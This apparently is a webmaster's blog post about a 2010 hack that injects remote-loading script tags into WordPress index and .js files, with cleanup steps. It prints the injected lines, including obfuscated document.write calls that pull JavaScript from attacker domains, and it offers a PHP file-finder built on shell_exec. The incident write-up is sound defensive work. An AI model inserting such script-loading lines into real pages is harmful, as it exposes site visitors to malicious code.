The Drunkjeans.com / Roundstorm.com Hack and how to get rid of it

Saturday morning a couple of my sites were hacked by something I’ve not found a lot of info about. I’ll call it The Drunkjeans Hack. I’ve also found this being inserted from other domains (see below).

Some idiot has inserted a piece of code into the main index.php file that looks like this:

<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"&gt;&lt;/script&gt;
&lt;!--bc02f73b8cefc99fd497a0d96d646c0e-->

The first line calls a JavaScript file on the given domain, while the second line is a unique identifier (consider yourself an individual).

What this thing does is unclear, but depending on how far the hackers get with this, it could be anything from a wonky homepage to the entire site being down. I did some digging and here’s what I found out:

This thing attacks all browser default files as well as .js files. Literally ALL of them in your site, including sub directories. Browser default files are index.php, index.htm, index.html, start.thm, start.html et cetera.

In WordPress, there’s an index.php in your root and one in your theme’s directory.

There are also several .js files cattered all over the installation, including plugin and theme subdirectories so it can be a rather lenghty search…

The good news is that it appears that the exploit does not seem to mess with your database from what I can tell.

What does it do?

The Hack attaches a piece of code that loads a Javascript whereever it can. What it does is unclear (I tried to download one for closer inspection but it didn’t work). It does this either as a <script> tag or a JavaScript document.write statement.

A good example for this is the Next Gen Gallery Plugin, which uses the Shutter Reloaded library. Here’s what I found at the end of the shutter-reloaded.js file (in wp-content/plugins/nextgen-gallery/shutter/):

document.write('<s'+'cript type="text/javascript" src="http://oldgoal.com:8080/Database.js"></scr'+'ipt>');

Why does it do that?

I think I’ve discovered the big idea now: on a shared hosting package with Strato in Germany I found some files that redirected the site to several Viagra Shops (like Superviagraonline.com – grab a bargain while it’s hot).

How can we kill it, Cap’n?

Looks like deleting the code and saving the file is doing a good job. The code is always at the end of the aforementioned files so it’s fairly easy to find – once you know which file it’s attached itself to. Use a security software, try Trend Micro, Sophos or the free version of AVG for clues.

If you want to find EVERY file on your site that’s infected issue this server command in your home directory:

grep -r 'roundstorm.com' *
Be patient, this could take a while. This command will show you a long list of everything that’s infected in your directories and sub directories. It’s then up to you to open every one of them and delete the piece of code.
Once your files are clean, you’re well advised to change ownership of these (or all files) to root and permissions to “read only” via the following command – this only works if you have shell access though:
chown root index.php
chmod 444 index.php

PHP Finder Script

I figured that many of us don’t have the liberty of sheel access, so I’ve devised this little php script that should do the hard work of finding infected files for you.

Copy the code below into a new text file, call it test.php and upload to the root directory of your site. Then call it in a browser (say by http://www.yoursite.com/test.php) and the script will get to work. This can take a few minutes – be patient.

<?php
$input = "grep -r " . "'" . "roundstorm.com" . "'" . " *";
echo $input;
$output = shell_exec($input);
echo "&lt;pre&gt;#$output&lt;/pre&gt;";
?>

Replace the “roundstorm.com” domain with whatever bug you think you have. To be 100% sure, run the script several times with all the domain variations listed below.

Variations

So far I’ve found the following code fragments. Your site is only ever affected by one of these domains so that’s the one to search your files for.

A WHOIS lookup reveals that these domains were registered on the 7th of July 2010 in Rubaix, France via Bizcn.com (that’s a Chinese ISP and Hosting Provider).

  • Drunkjeans.com

<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--bc02f73b8cefc99fd497a0d96d646c0e-->

  • Roundstorm.com

<script type="text/javascript" src="http://roundstorm.com:8080/Raster_Graphic.js"></script>
<!--8a4dc551741b1d10ebb7f9be14f2fd86-->

<script type="text/javascript" src="http://roundstorm.com:8080/Online.js"></script>
<!--aece678dacd5049fe548c4340509b03d-->

What’s funny about this vairation is that apparnetly McAfee have classed this domain as SAFE… why am I not surprised?

  • Tightsales.com

<script type="text/javascript" src="http://tightsales.com:8080/Gnutella.js"></script>
<!--ff2dbb7d5af9170e22a852d7c5329dd4-->

  • Oldgoal.com

<script type="text/javascript" src="http://oldgoal.com:8080/Database.js"></script>
<!--c7be90541d124051804d7e894f2ca5f8-->

  • Ionicclock.com

<script type="text/javascript" src="http://ionicclock.com:8080/P2P.js"></script>
<!--4af2b43758e09b79597726bfba081cdb-->

  • Hugejar.com

<script type="text/javascript" src="http://hugejar.com:8080/Bandwidth.js"></script>
<!--fa1321ff9c78ec6db9352bd10fba5ee4-->

  • Pantscow.ru
&lt;script type="text/javascript" src="<a href="view-source:http://pantscow.ru:8080/Null.js">http://pantscow.ru:8080/Null.js</a>"&gt;&lt;/script&gt;
&lt;!--4959c803f900d6a68b1b0140227118ba--&gt;
  • Malepad.ru
document.write('&lt;s'+'cript type="text/javascript"
src="http://malepad.ru:8080/QuickTime.js"&gt;&lt;/scr'+'ipt&gt;');
  • Galslime.com

In the WP backend, I could see something being called from galslime.com – not sure which file is compromised but I’m determined to find out.

Further Reading

Some forum posts I found about this exploit:





Jay is the CEO and founder of WP Hosting, a boutique style managed WordPress hosting and support service. He has been working with Plesk since version 9 and is a qualified Parallels Automation Professional. In his spare time he likes to develop iOS apps and WordPress plugins, or drawing on tablet devices. He blogs about his coding journey at http://wpguru.co.uk and http://pinkstone.co.uk.